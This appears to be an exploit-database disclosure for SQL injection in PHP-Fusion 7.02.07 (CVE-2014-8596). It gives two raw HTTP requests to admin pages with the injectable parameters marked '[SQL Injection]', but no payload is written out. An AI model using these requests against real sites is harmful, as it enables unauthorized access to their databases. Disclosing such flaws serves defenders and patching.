55 lines
No EOL
1.6 KiB
Text
55 lines
No EOL
1.6 KiB
Text
# Exploit Title: PHP-Fusion 7.02.07 SQL Injection
|
|
# Date: 06/11/2014
|
|
# Exploit Author: Mauricio Correa
|
|
# Vendor Homepage: www.php-fusion.co.uk
|
|
# Software Link:
|
|
http://ufpr.dl.sourceforge.net/project/php-fusion/PHP-Fusion%20Archives/7.x/
|
|
PHP-Fusion-7.02.07.zip
|
|
# Version: 7.02.07
|
|
# Tested on: Linux OS (Debian)
|
|
# CVE : CVE-2014-8596
|
|
|
|
|
|
|
|
GET
|
|
/PHP-Fusion/files/administration/submissions.php?action=2&aid=9b23a9871adc75
|
|
cd&submit_id=1[SQL Injection]&t=n HTTP/1.1
|
|
Host: 192.168.0.105
|
|
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:33.0) Gecko/20100101
|
|
Firefox/33.0
|
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
|
Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
|
|
Accept-Encoding: gzip, deflate
|
|
Cookie:
|
|
fusion68fF5_user=1.1414718441.a8ab620bccfcc51e12da05d5ab81734a44f1cabd25f620
|
|
b17122152bf157283f; fusion68fF5_lastvisit=1414550801;
|
|
session_id_8000=e987f4ac3b66045a9ce1ee9343c9a619dab98eb9;
|
|
fusion68fF5_visited=yes; has_js=1;
|
|
Connection: keep-alive
|
|
|
|
|
|
|
|
and
|
|
|
|
|
|
|
|
GET
|
|
/PHP-Fusion/files/administration/members.php?aid=9b23a9871adc75cd&status=4[S
|
|
QL Injection] HTTP/1.1
|
|
Host: 192.168.0.105
|
|
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:33.0) Gecko/20100101
|
|
Firefox/33.0
|
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
|
Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
|
|
Accept-Encoding: gzip, deflate
|
|
Cookie:
|
|
fusion68fF5_user=1.1414718441.a8ab620bccfcc51e12da05d5ab81734a44f1cabd25f620
|
|
b17122152bf157283f; fusion68fF5_lastvisit=1414550801;
|
|
session_id_8000=e987f4ac3b66045a9ce1ee9343c9a619dab98eb9;;
|
|
fusion68fF5_visited=yes; has_js=1;
|
|
Connection: keep-alive
|
|
|
|
|
|
|
|
|
|
More informations (in Portuguese Br): https://www.xlabs.com.br/blog/?p=282 |